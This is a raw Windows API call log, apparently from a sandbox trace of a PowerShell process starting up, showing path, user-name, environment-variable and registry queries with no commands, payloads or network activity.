	[0149.201] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0149.201] SetErrorMode (uMode=0x1) returned 0x1
	[0149.201] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.202] SetErrorMode (uMode=0x1) returned 0x1
	[0149.202] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0149.202] SetErrorMode (uMode=0x1) returned 0x1
	[0149.202] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x1ccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0149.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.202] SetErrorMode (uMode=0x1) returned 0x1
	[0149.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.203] SetErrorMode (uMode=0x1) returned 0x1
	[0149.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cccc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.203] SetErrorMode (uMode=0x1) returned 0x1
	[0149.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cced0 | out: lpFileInformation=0x1cced0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.203] SetErrorMode (uMode=0x1) returned 0x1
	[0149.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1cccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x1ccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1ccf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0149.206] SetErrorMode (uMode=0x1) returned 0x1
	[0149.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1cd190 | out: lpFileInformation=0x1cd190*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0149.207] SetErrorMode (uMode=0x1) returned 0x1
	[0149.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.338] CoTaskMemAlloc (cb=0x804) returned 0x1b80ae70
	[0149.338] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b80ae70, nSize=0x1cd4f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd4f8) returned 0x1
	[0149.413] CoTaskMemFree (pv=0x1b80ae70) 
	[0149.413] CoTaskMemAlloc (cb=0x204) returned 0x3e4db0
	[0149.413] GetUserNameW (in: lpBuffer=0x3e4db0, pcbBuffer=0x1cd538 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd538) returned 1
	[0149.413] CoTaskMemFree (pv=0x3e4db0) 
	[0149.415] ReportEventW (hEventLog=0x1b8c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3026328*="Available", lpRawData=0x30260b8) returned 1
	[0149.497] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.497] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.498] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.499] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.499] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.499] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.508] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.508] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.508] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0149.508] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.508] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.508] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0149.508] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.511] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.511] GetCurrentProcessId () returned 0x708
	[0149.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.513] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.514] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.517] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd518 | out: phkResult=0x1cd518*=0x36c) returned 0x0
	[0149.517] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd49c, lpData=0x0, lpcbData=0x1cd498*=0x0 | out: lpType=0x1cd49c*=0x1, lpData=0x0, lpcbData=0x1cd498*=0x56) returned 0x0
	[0149.517] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f1490
	[0149.517] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd46c, lpData=0x1b7f1490, lpcbData=0x1cd468*=0x56 | out: lpType=0x1cd46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd468*=0x56) returned 0x0
	[0149.517] CoTaskMemFree (pv=0x1b7f1490) 
	[0149.517] RegCloseKey (hKey=0x36c) returned 0x0
	[0149.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.520] CoTaskMemAlloc (cb=0x104) returned 0x1b7da9c0
	[0149.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7da9c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0149.520] CoTaskMemFree (pv=0x1b7da9c0) 
	[0149.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.521] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbeb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0149.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
